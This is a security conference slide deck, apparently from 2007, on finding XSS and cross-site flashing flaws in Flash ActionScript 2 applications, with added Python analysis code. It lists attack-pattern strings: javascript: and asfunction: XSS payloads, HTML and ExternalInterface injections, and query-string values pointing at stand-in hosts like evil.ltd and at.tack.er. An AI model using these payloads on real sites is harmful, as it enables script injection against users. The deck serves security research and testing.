OWASP/WASC AppSec 2007 San Jose: Finding Vulns in Flash Apps

1. Finding Vulnerabilities in Flash Applications
   Stefano Di Paola, CTO MindedSecurity, [email_address], +393209495590
2. $ whoami
   - Stefano Di Paola:
     - CTO & Co-Founder, Minded Security
     - Security Engineer & Researcher
     - Web App Pen Tester
     - Code Review and Forensics
     - Vulnerabilities (PDF UXSS & others)
     - OWASP Italy R&D Director
3. Agenda
   - Introduction
   - SWF Client Side Attacks
   - Finding Injection Entry Points
   - Potentially Dangerous Native Functions and Objects
   - Runtime Analysis
4. Agenda (section divider; repeats the list of slide 3)
5. Objectives
   - Focus on Flash ActionScript 2 application security
   - Understand the attack flow
   - Dead code analysis methodology
   - Runtime analysis methodology
6. Flash Apps - Security Concerns
   - Can execute JavaScript when embedded in an HTML page and viewed from inside a browser.
   - Can forge binary requests and HTTP requests.
   - Can execute external Flash movies.
   - Can play audio/video files natively.
   - Can display minimal HTML code inside a TextField.
7. Agenda (section divider; repeats the list of slide 3)
8. SWF Client Side Attacks
   - This new attack vector was presented at the OWASP AppSec 2007 conference in Milan, Italy.
   - It relies on flawed SWF files, not on the SWF parser.
   - A flawed SWF is a SWF that could allow:
     - classical XSS
     - Cross Site Flashing (the dark side of cross-movie scripting)
9. Cross Site Flashing (XSF)
   - XSF occurs when, from different domains:
     - one movie loads another movie with the loadMovie* functions or other hacks and gets access to the same sandbox, or part of it;
     - XSF can also occur when an HTML page uses JavaScript (*Script) to script a Macromedia Flash movie, for example by calling:
       - GetVariable: reads a public or static Flash object from JavaScript as a string;
       - SetVariable: sets a static or public Flash object to a new string value from JavaScript.
     - Unexpected browser-to-SWF communication could result in data being stolen from the SWF application.
10. Accomplishing an Attack using a flawed SWF
   - When a link to a flawed SWF is pasted directly into the location bar, every browser automatically generates some HTML with Object and/or Embed tags:

       <html>
       <body marginwidth="0" marginheight="0">
       <embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf"
              type="application/x-shockwave-flash"/>
       </body>
       </html>
11. Attack Example against a Flawed SWF
   - A flawed SWF was uploaded to the vi.ct.im host.
   - It contains the following code:

       v1.loadv = function () {
           this.varTarget = new MovieClip();
           _root.createEmptyMovieClip('varTarget', 10);
           var v2 = new XML();
           v2.load(_root.test);   // URL taken from an uninitialized _root variable
       };

   - Let's see what an attacker could do with a browser (Video).
12. Accomplishing an attack
   - So clicking on and redirecting to a SWF lets the browser execute it in the main window.
     - Works with every browser.
     - IE7 needs:
   - An iframe 'src' could be used too.
     - Tested on Firefox.
     - SWF/browser interaction doesn't work in IE7 using javascript: .
     - We'll see when it works even with IE7:
       - try{ code }catch(e){location.reload()}
13. The Attack Flow
   We will see the dangerous mechanisms that could lead to client-side attacks:
     - URL query string
     - Global uninitialized variables
     - flashVars
     - External movies
     - Remote XML files
     - MP3 and FLV movies
     - Embedded HTML
14. Agenda (section divider; repeats the list of slide 3)
15. Register Globals in ActionScript
   - Similar to PHP register_globals.
   - Every uninitialized variable with global scope is a potential threat:
     - _root.*
     - _global.*
     - _level0.*
     - .* (unqualified names)
   - It is easy to add it as a parameter in the query string:
     - http://URL?language=http://evil

       if (_root.language != undefined) {
           Locale.DEFAULT_LANG = _root.language;
       }
       v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
16. Register Globals in Included Files 1/2
   - Assumptions made about _levelN movies break when a movie supposed to sit at _level1 is loaded as _level0: its references become uninitialized globals.
   - _level(n-1).*

       /* Level0 Movie */
       _level0.DEMO_PATH = getHost(this._url);
       loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf',
                    (_level0.demo_level + 1));
       ....
       /* Level1 Movie 'upperlev.swf' */
       ....
       loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf',
                    (_level0.control_level + 1));
       ......
17. Register Globals in Included Files 2/2
   - Then let's load upperlev.swf directly and use the query string to initialize DEMO_PATH:
     - http://host/upperlev.swf?DEMO_PATH=http://evil

       /* Level1 Movie 'upperlev.swf' */
       ....
       loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf',
                    (_level0.control_level + 1));
       ......
18. Agenda (section divider; repeats the list of slide 3, plus one item: Static Analysis)
19. Attack Patterns – Quick Reference
   - Some attack patterns were already described in:
     - Testing Flash Applications
       - http://www.wisec.it/docs.php?id=5
   - A quick reference of attack patterns that trigger XSS in SWF:
     - asfunction:getURL,javascript:alert('XSS')
     - javascript:alert('XSS')
     - <img src='javascript:alert("XSS")//.jpg'>
     - http://evil.ltd/evilversion7.swf
20. Attack Patterns – Quick Reference
   - A quick reference of PDNF (Potentially Dangerous Native Functions) and objects where an attack pattern could be injected:
     - getURL
     - load*(URL, ...) functions
       - loadVariables(url, level)
       - loadMovie(url, target)
       - loadMovieNum(url, level)
       - XML.load(url)
       - LoadVars.load(url)
       - Sound.loadSound(url, isStreaming)
       - NetStream.play(url)
     - TextField.htmlText
21. Attack Patterns – getURL New Issue
   - The GET issue (or rather, feature):
     - From Adobe:
       - "..The GET method appends the variables to the end of the URL, and is used for small numbers of variables.."
     - If a SWF contains:

         getURL('javascript:SomeFunc("someValue")', '', 'GET')

       a request like

         http://victim/noundef.swf?a=0:0;alert('XSS')

       becomes:

         javascript:SomeFunc("someValue")?a=0:0;alert(123)

     - Credits go to SirDarckCat and Kuza55 who found it.
22. Attack Patterns – ExternalInterface New Issue
   - flash.external.ExternalInterface.call syntax:

       public static call(methodName:String, [parameter1:Object])

   - Actually, methodName could be any JavaScript code. In fact, when call('method123') is executed, the following JavaScript is evaluated (www.develotec.com/flash8api.txt):

       try { __flash__toXML(method123()); } catch (e) { "<undefined/>"; }
23. ExternalInterface Attack
   - What happens if a SWF contains:

       flash.external.ExternalInterface.call(_root.callback)

   - and is requested as:
     - http://host/swf?callback=(new Function("alert('Xss')"))
   - The generated JavaScript becomes:

       __flash__toXML((new Function("alert('Xss')"))())

   - Works with an iframe and IE7 too.
24. Attack Patterns – Font New Issue
   - Some code like:

       createTextField("txt", 999, 10, 10, 320, 240);
       txt.html = true;
       var _tf:TextFormat = new TextFormat();
       _tf.font = _root.fontFamily;
       txt.setTextFormat(_tf);
       txt.htmlText = 'something';

   - rewrites 'something' to:
     - <p font="TIMES">something</p>
   - That could be exploited by injecting:
     - fontFamily = '"><img src="http://evil/evil.swf"><"'
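The slide-24 pattern, as an added example that is not part of the original deck: a Python rendering of the <p font="..."> wrapper the slide describes, with the unchecked font name beside an allowlisted one, and a small tag check a tester can keep as a regression test. The allowlist, the regexes and the helper names are assumptions of this example, and the injection string is the one shown on the slide, used here as constructed test input.

```python
import re

# Constructed allowlist of font families the application is known to use (an assumption).
ALLOWED_FONTS = {'TIMES', 'ARIAL', 'VERDANA', '_SANS', '_SERIF', '_TYPEWRITER'}
FONT_NAME = re.compile(r'^[A-Za-z0-9 _-]{1,64}$')   # plain identifier, no markup characters
TAG_NAME = re.compile(r'<\s*/?\s*([A-Za-z]+)')


def render_font_paragraph(font, text):
    """Rebuild the <p font="..."> wrapper the slide says setTextFormat + htmlText produce.
    The font value is dropped into the attribute unchanged, exactly like the slide's code."""
    return f'<p font="{font}">{text}</p>'


def safe_font(font, default='TIMES'):
    """Hardened variant: accept only a plain font identifier on the allowlist, else fall back."""
    if isinstance(font, str) and FONT_NAME.match(font) and font.upper() in ALLOWED_FONTS:
        return font
    return default


def foreign_tags(html):
    """Tag names in the rendered fragment other than the expected <p> wrapper."""
    return sorted({t.lower() for t in TAG_NAME.findall(html)} - {'p'})


# The injection string shown on the slide, kept as constructed test input.
PAYLOAD = '"><img src="http://evil/evil.swf"><"'

if __name__ == '__main__':
    print(render_font_paragraph('TIMES', 'something'))
    print('raw :', foreign_tags(render_font_paragraph(PAYLOAD, 'something')))
    print('safe:', foreign_tags(render_font_paragraph(safe_font(PAYLOAD), 'something')))
```

The point of the allowlist is that a font name is an identifier, never free text, so the check can reject anything outside a small character set instead of trying to escape attribute delimiters.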
25. Modify the Data Flow 1/4
   - Multiple classes and packages are often used to separate functionality.
   - In Flash, every class/package like

       class simpleClass{}

     is compiled in the following way:

       push 'simpleClass'
       getVariable
       not
       not
       branchIfTrue label1
       ...
       label1
       end
26. Modify the Data Flow 2/4
   - Decompiled by flare, this results in:

       if (!simpleClass) {
           _global.simpleClass = function () {};
           ...
       }

   - So simpleClass is a _global attribute.
   - This means that it is initially undefined.
   - So it can be instantiated with a string value from the query string.
27. Modify the Data Flow 3/4
   - Suppose there is a class like:

       class simpleUtils {
           static public function testForSomething() {
               if (ok) return true;
               else return false;
           }
           ...
       }

       class simpleClass {
           static function main() {
               if (!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")');
               else getURL('javascript:alert("ok!")');
           }
           ...
       }
28. Modify the Data Flow 4/4
   - Sending the request:
     - http://host/swf.swf?simpleUtils=blah
   - sets the object simpleUtils to an instantiated string, so:
     - simpleUtils.testForSomething()
   - becomes undefined and the flow is modified:

       if (!simpleUtils.testForSomething())
           getURL('javascript:alert("Sorry!")');
       else
           getURL('javascript:alert("ok!")');
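A static pass over decompiled ActionScript 2 text that applies the entry-point rule of slides 15-17 (reads of _root/_global/_levelN members nobody assigned), the PDNF sink list of slide 20, the javascript: + GET getURL pattern of slide 21 and the class-shadowing observation of slides 25-28 (every declared class is a _global attribute). This is an added example, not the deck's tooling and not Minded Security's analyser; the regexes, the analyze() function and its report format are this example's own assumptions, and the sample input is constructed by joining fragments shown on the slides.

```python
import re

# Injection entry points named on the slides: uninitialized members of _root, _global, _levelN.
GLOBAL_REF = re.compile(r'\b(_root|_global|_level\d+)\.([A-Za-z_]\w*)')
# Potentially Dangerous Native Functions (PDNF) from the quick reference, matched as calls.
SINK_CALL = re.compile(
    r'\b(getURL|loadVariables|loadMovieNum|loadMovie|loadClip|loadSound|play|load)\s*\(',
    re.IGNORECASE)
# getURL('javascript:...', window, 'GET'): the movie's variables are appended to the script URL.
JS_GET = re.compile(
    r"""\bgetURL\s*\(\s*['"]javascript:.*?['"]\s*,\s*['"].*?['"]\s*,\s*['"]GET['"]\s*\)""", re.S)
ASSIGN = re.compile(r'^\s*(?:var\s+)?([A-Za-z_][\w.]*)(?:\s*:\s*\w+)?\s*=(?!=)\s*(.*)$', re.S)
CLASS_DECL = re.compile(r'\bclass\s+([A-Za-z_]\w*)')   # every class becomes a _global attribute


def mentions(text, name):
    """True when `name` occurs in `text` as a whole dotted identifier."""
    return re.search(r'(?<![\w.])' + re.escape(name) + r'(?!\w)', text) is not None


def analyze(source):
    """Flag uninitialized global reads, tainted PDNF calls, javascript:+GET getURL calls and
    shadowable class names in decompiled AS2 text. Statement splitting is crude: ';' or
    braces inside string literals and any control flow are not understood."""
    source = re.sub(r'/\*.*?\*/', ' ', source, flags=re.S)   # drop block comments
    initialized = set()   # global members assigned in this movie before being read
    tainted = set()       # identifiers whose value derives from an entry point
    report = {'entry_points': [], 'tainted_sinks': [], 'js_get': [],
              'classes': CLASS_DECL.findall(source)}

    for stmt in re.split(r'[;{}]', source):
        stmt = stmt.strip()
        if not stmt or stmt.startswith('//'):
            continue
        m = ASSIGN.match(stmt)
        lhs, rhs = (m.group(1), m.group(2)) if m else (None, stmt)

        # 1. a read of a global member nobody initialized is a query-string entry point
        for prefix, name in GLOBAL_REF.findall(rhs):
            full = f'{prefix}.{name}'
            if full not in initialized:
                if full not in report['entry_points']:
                    report['entry_points'].append(full)
                tainted.add(full)
        hits = sorted(t for t in tainted if mentions(rhs, t))

        # 2. plain assignments propagate taint; assigning a global member initializes it
        if lhs:
            if GLOBAL_REF.fullmatch(lhs):
                initialized.add(lhs)
            if hits:
                tainted.add(lhs)
            else:
                tainted.discard(lhs)
            if lhs.endswith('.htmlText') and hits:          # TextField.htmlText sink
                report['tainted_sinks'].append(('htmlText', hits))

        # 3. a PDNF call whose argument list mentions a tainted identifier
        for call in SINK_CALL.finditer(rhs):
            args = rhs[call.end():]
            arg_hits = sorted(t for t in tainted if mentions(args, t))
            if arg_hits:
                report['tainted_sinks'].append((call.group(1), arg_hits))
        if JS_GET.search(rhs):
            report['js_get'].append(stmt)
    return report


# Constructed sample input: fragments shown on slides 15, 16, 21 and 27, joined together.
SAMPLE = """
/* Level0 movie fragments followed by a getURL GET call and a class declaration */
if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; }
v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
_level0.DEMO_PATH = getHost(this._url);
loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1));
getURL('javascript:SomeFunc("someValue")', '', 'GET');
class simpleUtils { static public function testForSomething() { if (ok) return true; else return false; } }
"""

if __name__ == '__main__':
    for key, value in analyze(SAMPLE).items():
        print(f'{key}: {value}')
```

On the sample, _level0.DEMO_PATH is not reported because the movie assigns it before use, while _level0.PATH_DELIMITER and _level0.demo_level are, which is exactly the slide-16 case of a _level1 movie loaded as _level0. The pass is deliberately flow-insensitive: it is a triage aid for reading flare output, and every finding still needs to be confirmed by the runtime method of slides 30-33.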
29. Agenda (section divider; repeats the list of slide 3)
30. Recipe for Runtime Analysis
   - A method to find uninitialized variables
   - A SWF container which loads the external one
   - One array of attack patterns
   - A framework to mix our ingredients
31. Find Undefined Vars @ Runtime
   - Definition of __resolve:
     - from Adobe:
   - "a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method. If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined."
   - As we need to find _root.* or _global.* undefined variables:

       _root.__resolve = function (name) {
           // name is undefined
       };
32. Attack Patterns Array
   - From our knowledge base, an attack array will contain the following elements:
     - Direct load asfunction:
       - getURL,javascript:gotRoot("")///d.jpg
     - Controlled evil page/host:
       - http://at.tack.er/evil.swf
     - Flash HTML injection:
       - "'><img src='asfunction:getURL,javascript:gotRoot("")//.jpg'>
     - DOM injection:
       - (gotRoot(''))
     - JS/Flash error:
       - "'|!$%&/)=
33. A SWF Container
   - The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables.
   - The wrapper will contain __resolve methods for _root and _global.

       var image_mcl = new MovieClipLoader();
       image_mcl.addListener(mclListener);
       _root._lockroot = true;
       image_mcl.loadClip(_root.swfurl + "?" + _root.varToSend, _root.varTarget);
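The __resolve trick of slides 31-33 has a direct Python analogue in __getattr__, which likewise only fires for names that normal lookup cannot find. The following added example (not the deck's SWFRTAnalyzer, whose code the slides do not show) records every unresolved _root/_global read while a stand-in for the slide-15 movie logic runs, shows that a name already seeded by the container is no longer reported, and then builds the query string the slide-33 container appends. The scope class, movie_main() and build_probe_query() are constructed for this illustration.

```python
from urllib.parse import urlencode


class ResolvingScope:
    """Python stand-in for an AS2 timeline object (_root or _global) fitted with __resolve.
    __getattr__ only runs when normal lookup fails, which mirrors Flash Player consulting
    __resolve for an undefined property: the name is recorded and None (undefined) returned."""

    def __init__(self):
        object.__setattr__(self, 'vars', {})        # variables that have been assigned
        object.__setattr__(self, 'undefined', [])   # names read before any assignment

    def __setattr__(self, name, value):
        self.vars[name] = value                     # an assignment initializes the variable

    def __getattr__(self, name):                    # the __resolve analogue
        if name in self.vars:
            return self.vars[name]
        if name not in self.undefined:
            self.undefined.append(name)
        return None


def movie_main(root, glob):
    """Constructed stand-in for the slide-15 movie logic (reads _root.language, then loads
    a locale file), extended with two more uninitialized reads: _root.debug and _global.skin."""
    requests = []
    lang = root.language if root.language is not None else 'en'   # if (_root.language != undefined)
    requests.append(f'{lang}/player_{lang}.xml')                    # v5.load(...)
    if root.debug:                                                  # never assigned anywhere
        requests.append('debugger.swf')
    requests.append(glob.skin or 'default.swf')
    return requests


def find_undefined_vars(run, preset=None):
    """Run the movie logic inside resolving scopes and collect every unresolved name.
    `preset` stands for flashVars/query-string values the container already set on _root."""
    root, glob = ResolvingScope(), ResolvingScope()
    for name, value in (preset or {}).items():
        setattr(root, name, value)
    run(root, glob)
    return {'_root': list(root.undefined), '_global': list(glob.undefined)}


def build_probe_query(names, marker):
    """Query string a container would append to the target URL (slide 33: swfurl + '?' +
    varToSend), seeding each discovered name with the same marker value."""
    return urlencode([(name, marker) for name in names])


if __name__ == '__main__':
    found = find_undefined_vars(movie_main)
    print(found)        # {'_root': ['language', 'debug'], '_global': ['skin']}
    print(build_probe_query(found['_root'], 'probe'))
```

The real container runs the target movie unchanged and lets the player's own __resolve hook do the recording; the Python scope simply makes the mechanism visible. Seeding with a harmless marker first, and only then pairing each name with the slide-32 patterns, keeps the discovery step separate from the confirmation step and makes false positives cheap to rule out.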
34. A framework: SWFRTAnalyzer
35. Conclusions
   - A free version of the SWF Runtime Analyser will be released by Minded Security.
   - Awareness about ActionScript security is growing, but it is still a drop in the ocean.
   - There is still a lot of research to do on ActionScript security.
36. Thank you :) Questions?
   - Web: http://www.mindedsecurity.com
   - Weblog: http://www.wisec.it
   - Email: stefano.dipaola_at_mindedsecurity.com